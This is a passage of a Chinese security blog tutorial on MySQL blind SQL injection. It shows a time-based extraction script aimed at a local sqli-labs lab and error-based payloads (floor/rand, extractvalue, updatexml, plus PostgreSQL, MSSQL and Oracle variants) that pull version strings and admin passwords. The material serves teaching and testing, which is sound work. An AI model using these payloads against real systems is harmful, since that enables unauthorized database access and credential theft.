<li>condition 是判断条件</li>
<li>true 和false 是符合condition自定义的返回结果。</li>
</ul>
<p>本地测试感受一下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select ascii(mid(database(),1,1));</span><br><span class="line">+----------------------------+</span><br><span class="line">| ascii(mid(database(),1,1)) |</span><br><span class="line">+----------------------------+</span><br><span class="line">|                        115 |</span><br><span class="line">+----------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; select if(ascii(mid(database(),1,1))=115,sleep(5),1);</span><br><span class="line">+-----------------------------------------------+</span><br><span class="line">| if(ascii(mid(database(),1,1))=115,sleep(5),1) |</span><br><span class="line">+-----------------------------------------------+</span><br><span class="line">|                                             0 |</span><br><span class="line">+-----------------------------------------------+</span><br><span class="line">1 row in set (5.01 sec) </span><br><span class="line"></span><br><span class="line">mysql&gt; select if(ascii(mid(database(),1,1))=114,sleep(5),1);</span><br><span class="line">+-----------------------------------------------+</span><br><span class="line">| if(ascii(mid(database(),1,1))=114,sleep(5),1) |</span><br><span class="line">+-----------------------------------------------+</span><br><span class="line">|                                             1 |</span><br><span class="line">+-----------------------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></figure></p>
<p>如果<code>condition</code>判断为正确，则产生延迟，否则不产生延迟。<br>至于脚本，修改下上面的脚本进行判断即可。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">url = &quot;http://192.168.2.100/sqli-labs/Less-9/?id=&quot;</span><br><span class="line">esndStr = &quot; and sleep(3))--+&quot;</span><br><span class="line">payload = &quot;1&apos; and ((ascii(mid((select &quot; + column_name + &quot; from &quot; + database_name + &quot;.&quot; + table_name + &quot;  limit &quot; + Result + &quot;,1),&quot; + Char + &quot;,1))&gt;&quot; + mid + &quot;)&quot;</span><br><span class="line">tempurl = url + payload + esndStr</span><br><span class="line">before_time = time.time()</span><br><span class="line">requests.head(tempurl)</span><br><span class="line">after_time = time.time()</span><br><span class="line">use_time = after_time - before_time</span><br><span class="line">if abs(use_time) &lt; 0.1:</span><br><span class="line">    return True</span><br><span class="line">else:</span><br><span class="line">    return False</span><br></pre></td></tr></table></figure></p>
<h1 id="报错的SQL盲注"><a href="#报错的SQL盲注" class="headerlink" title="报错的SQL盲注"></a>报错的SQL盲注</h1><p>如果页面上显示数据的报错信息，那么可以直接使用报错的方式把想要的信息爆出来。</p>
<p>比如在mysql中我们可以使用如下的经典语句进行报错。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;</span><br></pre></td></tr></table></figure></p>
<p>这是网上流传很广的一个版本，可以简化成如下的形式。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))</span><br></pre></td></tr></table></figure></p>
<p>如果关键的表被禁用了，可以使用这种形式<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))</span><br></pre></td></tr></table></figure></p>
<p>如果rand被禁用了可以使用用户变量来报错<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)</span><br></pre></td></tr></table></figure></p>
<p>其实这是mysql的一个bug所引起的，其他数据库都不会因为这个问题而报错。</p>
<p>另外，在mysql5.1版本新加入两个xml函数，也可以用来报错。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));</span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &apos;\admin888&apos;  </span><br><span class="line">mysql&gt; select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));  </span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &apos;^$admin888^$&apos;</span><br></pre></td></tr></table></figure></p>
<p>而在其他数据库中也可以使用不同的方法构成报错<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">PostgreSQL: /?param=1 and(1)=cast(version() as numeric)-- </span><br><span class="line">MSSQL: /?param=1 and(1)=convert(int,@@version)-- </span><br><span class="line">Sybase: /?param=1 and(1)=convert(int,@@version)-- </span><br><span class="line">Oracle &gt;=9.0: /?param=1 and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select </span><br><span class="line">replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)--</span><br></pre></td></tr></table></figure></p>
<p>参考：<br><a href="http://www.freebuf.com/articles/web/30841.html" target="_blank" rel="noopener">详解SQL盲注测试高级技巧</a><br><a href="https://www.cnblogs.com/lcamry/p/5763129.html" target="_blank" rel="noopener">MYSQL注入天书之盲注讲解</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>！坚持技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="https://ooo.0o0.ooo/2017/04/12/58ee21687d335.png" alt="RcoIl WeChat Pay">
          <p>微信打赏</p>
        </div>
      
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      RcoIl
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://rcoil.me/2017/11/MySQL-盲注浅析/" title="MySQL-盲注浅析">http://rcoil.me/2017/11/MySQL-盲注浅析/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web安全/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> Web安全</a>
          
            <a href="/tags/数据库/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 数据库</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/10/平衡信息杯-Write-Up/" rel="next" title="平衡信息杯-Write-Up">
                <i class="fa fa-chevron-left"></i> 平衡信息杯-Write-Up
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/01/编码转换工具/" rel="prev" title="编码转换工具 （C#入门）">
                编码转换工具 （C#入门） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>


    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODE5NS80NzY4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="RcoIl">
          <p class="site-author-name" itemprop="name">RcoIl</p>
           
              <p class="site-description motion-element" itemprop="description">好吃懒做，还有就是皮肤比黄皮果还黄！</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">25</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">6</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">16</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/RcoIl" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=rcoil@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-fa fa-envelope-open"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn/" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://blog.163.com/passw0a_d/" title="rootrain" target="_blank">rootrain</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://kerlinglovsec.lofter.com/" title="kerling" target="_blank">kerling</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.luolikong.vip/" title="Fire-ant" target="_blank">Fire-ant</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xnianq.cn/" title="xniang" target="_blank">xniang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://thief.one/" title="nMask" target="_blank">nMask</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://cate4cafe.com/" title="cate4cafe" target="_blank">cate4cafe</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.ansbase5.org/" title="心的开始" target="_blank">心的开始</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://klionsec.github.io/" title="klion" target="_blank">klion</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hone.cool/" title="Hone" target="_blank">Hone</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#注释关键字"><span class="nav-number">1.1.</span> <span class="nav-text">注释关键字</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Sql注入截取字符串常用函数"><span class="nav-number">1.2.</span> <span class="nav-text">Sql注入截取字符串常用函数</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#mid-函数"><span class="nav-number">1.2.1.</span> <span class="nav-text">mid()函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#substr-函数"><span class="nav-number">1.2.2.</span> <span class="nav-text">substr()函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Left-函数"><span class="nav-number">1.2.3.</span> <span class="nav-text">Left()函数</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#布尔SQL盲注"><span class="nav-number">2.</span> <span class="nav-text">布尔SQL盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#获取数据库名字"><span class="nav-number">2.1.</span> <span class="nav-text">获取数据库名字</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#获取表名"><span class="nav-number">2.2.</span> <span class="nav-text">获取表名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#获取列名"><span class="nav-number">2.3.</span> <span class="nav-text">获取列名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#爆字段"><span class="nav-number">2.4.</span> <span class="nav-text">爆字段</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#时间的SQL盲注"><span class="nav-number">3.</span> <span class="nav-text">时间的SQL盲注</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#报错的SQL盲注"><span class="nav-number">4.</span> <span class="nav-text">报错的SQL盲注</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
<!--
    <i class="fa fa-heart"></i>
-->
	<i class="fa fa-address-card-o" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">RcoIl</span>
</div>
<!--

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-blind" aria-hidden="true"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-user-md" aria-hidden="true"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("KVNdpVifyFqJPx0bzSg6cN7z-gzGzoHsz", "vlNRwqLbdUTKC1W06gjYj0iG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
